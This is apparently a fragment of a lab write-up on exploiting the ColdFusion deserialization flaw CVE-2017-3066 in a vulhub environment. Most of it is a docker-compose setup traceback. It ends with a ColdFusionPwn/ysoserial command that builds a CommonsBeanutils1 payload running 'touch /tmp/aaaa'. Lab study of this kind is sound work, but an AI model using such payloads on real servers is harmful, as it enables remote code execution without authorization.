CVE-2017-3066 深入利用获取命令回显

root@localhost:~/vulhub/coldfusion/CVE-2017-3066# docker-compose up -dTraceback (most recent call last):  File "/usr/local/lib/python3.8/dist-packages/requests/adapters.py", line 633, in send    conn = self.get_connection_with_tls_context(  File "/usr/local/lib/python3.8/dist-packages/requests/adapters.py", line 489, in get_connection_with_tls_context    conn = self.poolmanager.connection_from_host(  File "/usr/local/lib/python3.8/dist-packages/urllib3/poolmanager.py", line 303, in connection_from_host    return self.connection_from_context(request_context)  File "/usr/local/lib/python3.8/dist-packages/urllib3/poolmanager.py", line 325, in connection_from_context    raise URLSchemeUnknown(scheme)urllib3.exceptions.URLSchemeUnknown: Not supported URL scheme http+dockerDuring handling of the above exception, another exception occurred:Traceback (most recent call last):  File "/usr/bin/docker-compose", line 11, in <module>    load_entry_point('docker-compose==1.25.0', 'console_scripts', 'docker-compose')()  File "/usr/lib/python3/dist-packages/compose/cli/main.py", line 72, in main    command()  File "/usr/lib/python3/dist-packages/compose/cli/main.py", line 125, in perform_command    project = project_from_options('.', options)  File "/usr/lib/python3/dist-packages/compose/cli/command.py", line 53, in project_from_options    return get_project(  File "/usr/lib/python3/dist-packages/compose/cli/command.py", line 151, in get_project    return Project.from_config(  File "/usr/lib/python3/dist-packages/compose/project.py", line 102, in from_config    service_networks = get_networks(service_dict, networks)  File "/usr/lib/python3/dist-packages/compose/network.py", line 320, in get_networks    networks[network.true_name] = netdef  File "/usr/lib/python3/dist-packages/compose/network.py", line 125, in true_name    self._set_legacy_flag()  File "/usr/lib/python3/dist-packages/compose/network.py", line 146, in _set_legacy_flag    data = self.inspect(legacy=True)  File "/usr/lib/python3/dist-packages/compose/network.py", line 106, in inspect    return self.client.inspect_network(self.legacy_full_name)  File "/usr/lib/python3/dist-packages/docker/utils/decorators.py", line 19, in wrapped    return f(self, resource_id, *args, **kwargs)  File "/usr/lib/python3/dist-packages/docker/api/network.py", line 212, in inspect_network    res = self._get(url, params=params)  File "/usr/lib/python3/dist-packages/docker/utils/decorators.py", line 46, in inner    return f(self, *args, **kwargs)  File "/usr/lib/python3/dist-packages/docker/api/client.py", line 230, in _get    return self.get(url, **self._set_request_timeout(kwargs))  File "/usr/local/lib/python3.8/dist-packages/requests/sessions.py", line 602, in get    return self.request("GET", url, **kwargs)  File "/usr/local/lib/python3.8/dist-packages/requests/sessions.py", line 589, in request    resp = self.send(prep, **send_kwargs)  File "/usr/local/lib/python3.8/dist-packages/requests/sessions.py", line 703, in send    r = adapter.send(request, **kwargs)  File "/usr/local/lib/python3.8/dist-packages/requests/adapters.py", line 637, in send    raise InvalidURL(e, request=request)requests.exceptions.InvalidURL: Not supported URL scheme http+docker

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e  CommonsBeanutils1 'touch /tmp/aaaa' poc.ser